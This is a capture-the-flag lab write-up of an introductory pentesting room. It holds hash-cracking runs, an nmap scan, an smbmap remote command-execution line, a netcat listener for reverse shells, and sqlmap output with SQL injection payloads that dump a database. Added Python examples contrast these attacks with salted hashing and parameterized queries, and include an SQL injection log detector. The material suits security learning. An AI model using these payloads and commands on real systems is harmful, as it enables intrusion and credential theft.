Crash course pentesting

This is a guided room, as it seems, so I won't say much here; this is more an introduction to various pentesting tools. The interesting part is the final exam folder (check the bottom of this writeup).
Gobuster
/.hta (Status: 403) [Size: 277]
/.htaccess (Status: 403) [Size: 277]
/.htpasswd (Status: 403) [Size: 277]
/index.html (Status: 200) [Size: 11321]
/secret (Status: 301) [Size: 313] [--> http://10.10.191.25/secret/]
/server-status (Status: 403) [Size: 277]
/index.html (Status: 200) [Size: 11321]
/password.xxa (Status: 200) [Size: 12]
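As an added example (not part of the original write-up), here is a small Python parser for the gobuster lines above that sorts hits the way a reviewer reads them: 200s are readable content, 301s with a redirect target are directories, and 403s that all share one response size are the server's stock Forbidden page (Apache's default config denies any `.ht*` file, which is why `.hta`, `.htaccess` and `.htpasswd` show up at all), so a 403 with an unusual size is the one worth a second look. The sample input is the page's own output pasted into a string, with the repeated `/index.html` line dropped.

```python
import re
from collections import Counter
from dataclasses import dataclass
from typing import Optional

# Sample input: the gobuster lines from this write-up, embedded so the parser runs offline.
SAMPLE_GOBUSTER_OUTPUT = """\
/.hta (Status: 403) [Size: 277]
/.htaccess (Status: 403) [Size: 277]
/.htpasswd (Status: 403) [Size: 277]
/index.html (Status: 200) [Size: 11321]
/secret (Status: 301) [Size: 313] [--> http://10.10.191.25/secret/]
/server-status (Status: 403) [Size: 277]
/password.xxa (Status: 200) [Size: 12]
"""

# One gobuster "dir" result line: path, status, size, optional redirect target.
LINE_RE = re.compile(
    r"^(?P<path>/\S*)\s+\(Status:\s*(?P<status>\d{3})\)\s+\[Size:\s*(?P<size>\d+)\]"
    r"(?:\s+\[-->\s*(?P<redirect>[^\]]+)\])?\s*$"
)


@dataclass
class Hit:
    path: str
    status: int
    size: int
    redirect: Optional[str] = None


def parse_gobuster(text: str) -> list[Hit]:
    """Parse gobuster dir output; lines that do not match (banners, progress) are skipped."""
    hits = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            hits.append(Hit(m["path"], int(m["status"]), int(m["size"]), m["redirect"]))
    return hits


def triage(hits: list[Hit]) -> dict:
    """Group hits by what they mean to a reviewer and flag 403s with a non-standard size."""
    readable = [h for h in hits if h.status == 200]
    directories = [h for h in hits if h.status in (301, 302) and h.redirect]
    forbidden = [h for h in hits if h.status == 403]
    # The most common 403 size is the server's stock error page; any other size stands out.
    baseline = Counter(h.size for h in forbidden).most_common(1)[0][0] if forbidden else None
    unusual_403 = [h for h in forbidden if h.size != baseline]
    return {
        "readable": readable,
        "directories": directories,
        "forbidden": forbidden,
        "baseline_403_size": baseline,
        "unusual_403": unusual_403,
    }


if __name__ == "__main__":
    result = triage(parse_gobuster(SAMPLE_GOBUSTER_OUTPUT))
    for key in ("readable", "directories", "unusual_403"):
        print(key, [h.path for h in result[key]])
    print("stock 403 size:", result["baseline_403_size"])
```

On this run the two 200s (`/index.html`, `/password.xxa`) and the `/secret` directory are the only hits worth following; every 403 has the stock size 277, so none of them indicates anything beyond Apache's default deny rules.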
Hashcat
$ hashcat -m 0 '56ab24c15b72a457069c5ea42fcfc640' /usr/share/wordlists/rockyou.txt
hashcat (v6.1.1) starting...
OpenCL API (OpenCL 1.2 pocl 1.6, None+Asserts, LLVM 9.0.1, RELOC, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
=============================================================================================================================
* Device #1: pthread-Intel(R) Core(TM) i5-6400T CPU @ 2.20GHz, 2883/2947 MB (1024 MB allocatable), 2MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Applicable optimizers applied:
* Zero-Byte
* Early-Skip
* Not-Salted
* Not-Iterated
* Single-Hash
* Single-Salt
* Raw-Hash
ATTENTION! Pure (unoptimized) backend kernels selected.
Using pure kernels enables cracking longer passwords but for the price of drastically reduced performance.
If you want to switch to optimized backend kernels, append -O to your commandline.
See the above message to find out about the exact limits.
Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.
Host memory required for this attack: 64 MB
Dictionary cache built:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 3 secs
56ab24c15b72a457069c5ea42fcfc640:happy
Session..........: hashcat
Status...........: Cracked
Hash.Name........: MD5
Hash.Target......: 56ab24c15b72a457069c5ea42fcfc640
Time.Started.....: Sat Nov 6 21:25:47 2021 (4 secs)
Time.Estimated...: Sat Nov 6 21:25:51 2021 (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 599 H/s (0.27ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests
Progress.........: 2048/14344385 (0.01%)
Rejected.........: 0/2048 (0.00%)
Restore.Point....: 0/14344385 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: 123456 -> lovers1
hashcat -m 900 '4bc9ae2b9236c2ad02d81491dcb51d5f' /usr/share/wordlists/rockyou.txt
4bc9ae2b9236c2ad02d81491dcb51d5f:nootnoot
Impacket
Oh yes, I know those. A very useful scripts collection, especially for Windows.
John the ripper
Another legendary tool. If you cracked passwords on Linux you know John the Ripper, or if you were in Victorian England in the past too… but not in the nice way.
john --wordlist=/usr/share/wordlists/rockyou.txt --format=RAW-MD5 '/home/nair0lf32/Desktop/Stuff/THM/Crash Course Pentesting/hashes.txt'
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-MD5 [MD5 256/256 AVX2 8x3])
Warning: no OpenMP support for this hash type, consider --fork=2
Press 'q' or Ctrl-C to abort, almost any other key for status
hello (?)
1g 0:00:00:00 DONE (2021-11-06 21:59) 1.388g/s 533.3p/s 533.3c/s 533.3C/s 123456..michael1
Use the "--show --format=Raw-MD5" options to display all of the cracked passwords reliably
Session completed
john --wordlist=/usr/share/wordlists/rockyou.txt --format=RAW-SHA1 '/home/nair0lf32/Desktop/Stuff/THM/Crash Course Pentesting/hashes.txt'
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-SHA1 [SHA1 256/256 AVX2 8x])
Warning: no OpenMP support for this hash type, consider --fork=2
Press 'q' or Ctrl-C to abort, almost any other key for status
password (?)
1g 0:00:00:00 DONE (2021-11-06 22:00) 1.666g/s 13.33p/s 13.33c/s 13.33C/s 123456..rockyou
Use the "--show --format=Raw-SHA1" options to display all of the cracked passwords reliably
Session completed
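What every run above does is a plain dictionary attack: hash each candidate with the same unsalted, fast digest (`-m 0` and `--format=RAW-MD5` are MD5, `-m 900` is MD4, `--format=RAW-SHA1` is SHA-1) and compare. The Python below is an added example written for this write-up, not hashcat's or john's code: it re-creates that loop against the MD5 from the hashcat run above and against the SHA-1 of `password` (the word john recovered in the RAW-SHA1 run), using a constructed seven-word stand-in for rockyou.txt, and then shows the defender's counterpart, a salted PBKDF2 hash. The same loop still cracks a weak password stored that way, but each guess costs hundreds of thousands of MD5 guesses and the salt stops one cracking run from covering every user at once. MD4 is left out because `hashlib` only offers it when OpenSSL's legacy provider is loaded.

```python
import hashlib
import hmac
import os
import time

# Constructed mini-wordlist standing in for rockyou.txt (real runs use 14 million lines).
WORDLIST = ["123456", "password", "iloveyou", "princess", "happy", "hello", "lovers1"]

# Targets: the MD5 from the hashcat run in this write-up, and the SHA-1 of "password".
TARGETS = {
    "md5": "56ab24c15b72a457069c5ea42fcfc640",
    "sha1": "5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8",
}


def crack_unsalted(algo, target_hex, wordlist):
    """Dictionary attack on an unsalted digest: returns (plaintext, guesses) or (None, guesses)."""
    guesses = 0
    for word in wordlist:
        guesses += 1
        if hashlib.new(algo, word.encode()).hexdigest() == target_hex:
            return word, guesses
    return None, guesses


def store_pbkdf2(password, salt=None, iterations=600_000):
    """Salted, iterated storage format: pbkdf2_sha256$<iters>$<salt hex>$<dk hex>."""
    salt = os.urandom(16) if salt is None else salt
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"


def verify_pbkdf2(stored, candidate):
    """Recompute with the stored salt and iteration count; constant-time compare."""
    _, iters, salt_hex, dk_hex = stored.split("$")
    dk = hashlib.pbkdf2_hmac("sha256", candidate.encode(), bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(dk.hex(), dk_hex)


def crack_pbkdf2(stored, wordlist):
    """Same loop as crack_unsalted, but every guess pays the full PBKDF2 cost."""
    guesses = 0
    for word in wordlist:
        guesses += 1
        if verify_pbkdf2(stored, word):
            return word, guesses
    return None, guesses


def cost_ratio(iterations=600_000):
    """Wall-clock cost of one PBKDF2 guess divided by one MD5 guess (machine dependent)."""
    t0 = time.perf_counter()
    for _ in range(3):
        hashlib.pbkdf2_hmac("sha256", b"happy", b"\0" * 16, iterations)
    slow = (time.perf_counter() - t0) / 3
    t0 = time.perf_counter()
    for _ in range(10_000):
        hashlib.md5(b"happy").hexdigest()
    fast = (time.perf_counter() - t0) / 10_000
    return slow / fast


if __name__ == "__main__":
    for algo, target in TARGETS.items():
        print(algo, crack_unsalted(algo, target, WORDLIST))
    stored = store_pbkdf2("happy")
    print("pbkdf2", crack_pbkdf2(stored, WORDLIST))
    print(f"one PBKDF2 guess costs about {cost_ratio():,.0f} MD5 guesses")
```

The lesson is the one the `Speed.#1` and `Progress` lines above already hint at: hashcat found `happy` after 2048 candidates of a 14-million-line list because every MD5 guess is nearly free. A slow, salted scheme does not rescue a password that is in the wordlist, but it turns the `14344385` keyspace into a cost measured in hours per user rather than seconds for the whole file.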
Metasploit
The tool, the myth, the legend. Exploitation made easy. The one-tool army. The GOAT. The best in the industry, haha… you get the point.
Netcat
Basically does two things (as far as I can tell):
Banner grabbing:
echo " " | nc ip_address service_port
Listen for connections (good for reverse shells and file transfers):
nc -lvnp chosen_port
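To make the two halves concrete, here is an added Python example (mine, not from the room) that plays both roles on the loopback interface: a one-shot listener that answers with a constructed banner, standing in for `nc -lvnp`, and a client that connects, sends a blank line the way `echo " " | nc` does, and returns whatever the service volunteers. The banner text and the `mail.example.test` name are made up for the example.

```python
import socket
import threading

# Constructed banner for the demo service; no real host is involved.
BANNER = b"220 mail.example.test ESMTP service ready\r\n"


def serve_one_banner(listener, banner):
    """Stand-in for `nc -lvnp <port>`: accept one client, send the banner, read what it sends."""
    conn, _ = listener.accept()
    with conn:
        conn.sendall(banner)
        conn.settimeout(2.0)
        try:
            conn.recv(1024)  # the blank line the grabber sends
        except socket.timeout:
            pass


def grab_banner(host, port, timeout=2.0):
    """Stand-in for `echo " " | nc host port`: connect, send a blank line, return the first reply."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(b" \n")
        data = s.recv(1024)
    return data.decode(errors="replace").strip()


def demo():
    """Run listener and grabber against each other on 127.0.0.1 and return the grabbed banner."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind(("127.0.0.1", 0))  # port 0: let the OS pick a free port
    listener.listen(1)
    port = listener.getsockname()[1]
    server = threading.Thread(target=serve_one_banner, args=(listener, BANNER), daemon=True)
    server.start()
    try:
        return grab_banner("127.0.0.1", port)
    finally:
        server.join(2.0)
        listener.close()


if __name__ == "__main__":
    print(demo())
```

The grab works because many services speak first (SMTP, FTP, SSH), so the blank line is only there to keep `nc` from closing before the reply arrives. On the defensive side this is why version strings in banners matter: the nmap run later in this write-up learns `Apache/2.4.18 (Ubuntu)` from nothing more than the `Server` header, which `ServerTokens Prod` would have reduced to `Apache`.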
Nikto
Adding nikto to the enumeration process can be valuable. A great “vulnerability scanner”.
nmap
Another legend… but this one is getting a bit old; some faster tools based on it, like rustscan, are way faster. I still start all my enumerations with nmap though. There is not a single standard way to scan with nmap, and I like that.
Starting Nmap 7.92 ( https://nmap.org ) at 2021-11-06 19:22 WAT
NSE: Loaded 155 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 19:22
Completed NSE at 19:22, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 19:22
Completed NSE at 19:22, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 19:22
Completed NSE at 19:22, 0.00s elapsed
Initiating Ping Scan at 19:22
Scanning 10.10.191.25 [2 ports]
Completed Ping Scan at 19:22, 0.15s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 19:22
Completed Parallel DNS resolution of 1 host. at 19:22, 0.03s elapsed
Initiating Connect Scan at 19:22
Scanning 10.10.191.25 [1000 ports]
Discovered open port 80/tcp on 10.10.191.25
Increasing send delay for 10.10.191.25 from 0 to 5 due to 11 out of 35 dropped probes since last increase.
Connect Scan Timing: About 25.77% done; ETC: 19:24 (0:01:29 remaining)
Connect Scan Timing: About 33.90% done; ETC: 19:25 (0:01:59 remaining)
Connect Scan Timing: About 48.94% done; ETC: 19:25 (0:01:35 remaining)
Connect Scan Timing: About 69.82% done; ETC: 19:24 (0:00:52 remaining)
Completed Connect Scan at 19:25, 186.50s elapsed (1000 total ports)
Initiating Service scan at 19:25
Scanning 1 service on 10.10.191.25
Completed Service scan at 19:25, 6.33s elapsed (1 service on 1 host)
NSE: Script scanning 10.10.191.25.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 19:25
Completed NSE at 19:25, 6.73s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 19:25
Completed NSE at 19:25, 0.56s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 19:25
Completed NSE at 19:25, 0.00s elapsed
Nmap scan report for 10.10.191.25
Host is up, received syn-ack (1.4s latency).
Scanned at 2021-11-06 19:22:03 WAT for 200s
Not shown: 999 closed tcp ports (conn-refused)
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-methods:
|_ Supported Methods: POST OPTIONS GET HEAD
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 19:25
Completed NSE at 19:25, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 19:25
Completed NSE at 19:25, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 19:25
Completed NSE at 19:25, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 202.77 seconds
Smbclient
We use that a lot already: if Samba is open, enumerate the shares.
Smbmap
smbmap -u admin -p password -h 10.10.10.10 -x "ipconfig"
Sqlmap
SQL injection is too hard for you? Or are you just “too good” to try and craft a contextual payload every time? Is trial and error your worst nightmare? Is that time-based SQLi vulnerability taking too long for you? Then we've got something for you. Automate the boring stuff (kek) with sqlmap.
Look how we effortlessly identify and exploit SQL injection vulnerabilities in this form:
sqlmap -u http://10.10.145.151/ --forms -b
---
Parameter: msg (POST)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: msg=auFb' RLIKE (SELECT (CASE WHEN (1109=1109) THEN 0x61754662 ELSE 0x28 END))-- GJgv
Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: msg=auFb' AND GTID_SUBSET(CONCAT(0x71787a7671,(SELECT (ELT(7550=7550,1))),0x7171627671),7550)-- aFqL
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: msg=auFb' AND (SELECT 6882 FROM (SELECT(SLEEP(5)))Rgtr)-- NjzB
---
[00:05:38] [INFO] the back-end DBMS is MySQL
[00:05:38] [INFO] fetching banner
[00:05:38] [WARNING] reflective value(s) found and filtering out
[00:05:38] [INFO] retrieved: '5.7.28-0ubuntu0.16.04.2'
web server operating system: Linux Ubuntu
web application technology: PHP 7.0.33
back-end DBMS operating system: Linux Ubuntu
back-end DBMS: MySQL >= 5.6
banner: '5.7.28-0ubuntu0.16.04.2'
[00:07:25] [INFO] fetching current user
[00:07:25] [WARNING] reflective value(s) found and filtering out
[00:07:25] [INFO] retrieved: 'root@localhost'
current user: 'root@localhost'
[00:08:07] [INFO] fetching current database
[00:08:07] [WARNING] reflective value(s) found and filtering out
[00:08:07] [INFO] retrieved: 'tests'
current database: 'tests'
sqlmap -u http://10.10.145.151/ --forms -D tests --dump
[00:11:02] [INFO] fetching tables for database: 'tests'
[00:11:02] [INFO] resumed: 'lol'
[00:11:02] [INFO] resumed: 'msg'
[00:11:03] [INFO] fetching columns for table 'msg' in database 'tests'
[00:11:03] [WARNING] reflective value(s) found and filtering out
[00:11:03] [INFO] retrieved: 'msg'
[00:11:03] [INFO] retrieved: 'varchar(100)'
[00:11:03] [INFO] fetching entries for table 'msg' in database 'tests'
[00:11:03] [INFO] retrieved: 'msg'
[00:11:03] [INFO] retrieved: 'test'
Database: tests
Table: msg
[2 entries]
+------+
| msg |
+------+
| msg |
| test |
+------+
[00:11:04] [INFO] table 'tests.msg' dumped to CSV file '/home/ya_homie/.local/share/sqlmap/output/10.10.145.151/dump/tests/msg.csv'
[00:11:04] [INFO] fetching columns for table 'lol' in database 'tests'
[00:11:04] [INFO] retrieved: 'flag'
[00:11:05] [INFO] retrieved: 'varchar(100)'
[00:11:05] [INFO] fetching entries for table 'lol' in database 'tests'
[00:11:05] [INFO] retrieved: 'found_me'
Database: tests
Table: lol
[1 entry]
+----------+
| flag |
+----------+
| found_me |
+----------+
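To see why the three payload types above work, and what removes them, here is an added Python example (written for this write-up, not sqlmap's or the target's code) that rebuilds the `tests` database from the dump above in an in-memory SQLite connection. `lookup_vulnerable` concatenates the `msg` field into the query, which is presumably what the target form does; `lookup_parameterized` binds it instead. `blind_oracle_differs` is sqlmap's boolean-based blind check in miniature: if a true and a false condition produce different responses, the parameter is injectable. A last helper flags the payload shapes from the sqlmap output in request logs. SQLite has no `RLIKE` or `GTID_SUBSET`, so the test payloads are reduced to their generic `AND 1=1` / `AND 1=2` form.

```python
import re
import sqlite3


def make_db():
    """Constructed copy of the 'tests' database dumped above: two tables, three rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE msg (msg VARCHAR(100))")
    conn.execute("CREATE TABLE lol (flag VARCHAR(100))")
    conn.executemany("INSERT INTO msg VALUES (?)", [("msg",), ("test",)])
    conn.execute("INSERT INTO lol VALUES (?)", ("found_me",))
    conn.commit()
    return conn


def lookup_vulnerable(conn, user_msg):
    """String-built query: a quote in user_msg closes the literal and the rest is parsed as SQL."""
    sql = f"SELECT msg FROM msg WHERE msg = '{user_msg}'"
    return [row[0] for row in conn.execute(sql)]


def lookup_parameterized(conn, user_msg):
    """Bound parameter: user_msg is only ever compared as a value, never parsed as SQL."""
    return [row[0] for row in conn.execute("SELECT msg FROM msg WHERE msg = ?", (user_msg,))]


def blind_oracle_differs(lookup, conn):
    """Boolean-based blind test: do a true and a false condition give different responses?"""
    true_case = lookup(conn, "test' AND 1=1 -- ")
    false_case = lookup(conn, "test' AND 1=2 -- ")
    return true_case != false_case


# Request-log detection for the payload shapes seen in the sqlmap output above.
# A weak control on its own (sqlmap ships tamper scripts); the real fix is binding parameters.
SQLI_MARKERS = re.compile(
    r"(?i)(\bsleep\s*\(|\brlike\b|\bgtid_subset\s*\(|\bunion\s+select\b|\bbenchmark\s*\("
    r"|'\s*(and|or)\s+\d+\s*=\s*\d+)"
)


def looks_like_injection(value):
    """True when a request parameter carries one of the marker patterns."""
    return bool(SQLI_MARKERS.search(value))


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, 1=1:", lookup_vulnerable(db, "test' AND 1=1 -- "))
    print("vulnerable, 1=2:", lookup_vulnerable(db, "test' AND 1=2 -- "))
    print("vulnerable, UNION:", lookup_vulnerable(db, "x' UNION SELECT flag FROM lol -- "))
    print("parameterized, UNION:", lookup_parameterized(db, "x' UNION SELECT flag FROM lol -- "))
    print("oracle (vulnerable):", blind_oracle_differs(lookup_vulnerable, db))
    print("oracle (parameterized):", blind_oracle_differs(lookup_parameterized, db))
```

The parameterized version returns nothing for every payload because no stored row literally equals the string `test' AND 1=1 -- `, so the true and false cases are identical and sqlmap has no oracle to work with. The `--dump` of `lol` above is the same mechanism carried further: once one string-built query exists, the rest of the database (and, as `root@localhost` shows, the whole server) is reachable through it.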
Post Exploitation
“I am in… now what?”
Here, little skiddy, have these handy:
General:
https://github.com/swisskyrepo/PayloadsAllTheThings (A bunch of tools and payloads for every stage of pentesting)
Linux:
https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/ (a bit old but still worth looking at)
https://github.com/rebootuser/LinEnum (One of the most popular priv esc scripts)
https://github.com/diego-treitos/linux-smart-enumeration/blob/master/lse.sh (Another popular script)
https://github.com/mzet-/linux-exploit-suggester (A Script that’s dedicated to searching for kernel exploits)
https://gtfobins.github.io (I can not overstate the usefulness of this for priv esc, if a common binary has special permissions, you can use this site to see how to get root perms with it.)
Windows:
https://www.fuzzysecurity.com/tutorials/16.html (Dictates some very useful commands and methods to enumerate the host and gain intel)
https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerUp (A bit old but still an incredibly useful script)
https://github.com/411Hall/JAWS (A general enumeration script)
Final exam
Click to check the solution to the Final Exam (flags are on me today, so spoiler alert)